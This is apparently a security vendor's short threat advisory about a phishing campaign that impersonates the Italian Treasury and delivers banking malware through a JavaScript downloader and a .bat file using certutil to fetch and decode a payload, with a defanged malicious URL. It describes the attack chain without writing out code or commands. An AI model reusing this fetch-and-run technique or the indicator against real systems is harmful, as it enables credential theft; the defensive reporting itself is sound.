Cynet Detects the Mail Botnet That Has Been Hitting Italian Companies

The Cynet 360 platform successfully detects the latest Botnet to hit Italian companies. The Botnet comes by way of a legitimate-looking email appearing to be sent by the Italian Department of Treasury using subjects such as, “Codici Tributo Acconti” (Tribute Advocates Codes). The attacker has chosen a subject that people are likely to fall for, as this subject line is used frequently within the framework of business administration. The e-mails though, are sent from unknown addresses not related to the Italian Department of Treasury. Some of the reported addresses include: [email protected] or [email protected]

The mail has a link that opens the browser and downloads a JS file. It then uses a GET connection to 239outdoors[.]com/themes5.php, to drop a file called 1t.exe to the host. The file (which looks like banker malware) is then executed by the JS, which communicates with CNC server, awaiting commands and sending the CNC the stolen credentials. It also sends details of IPs, persistence, etc.

Additionally, the URL appears to drop another malicious threat, “Nuovo Documento 2008.” This is a .bat file that uses the “certutil for delivery of file” technique to drop and execute another file, which downloads an encoded payload. The technique is silent and does not raise red flags for suspicious activity. After decoding and running the payload unslaa.exe, it behaves the same as 1t.exe. The file also communicates with the same CNC server.

The Cynet 360 system detects and protects against these attacks. We also we recommend that as part of best practices, you:

  • Educate employees to proceed cautiously with email attachments.
  • Check carefully before clicking links in email messages.
  • Still not sure? Contact us with any questions.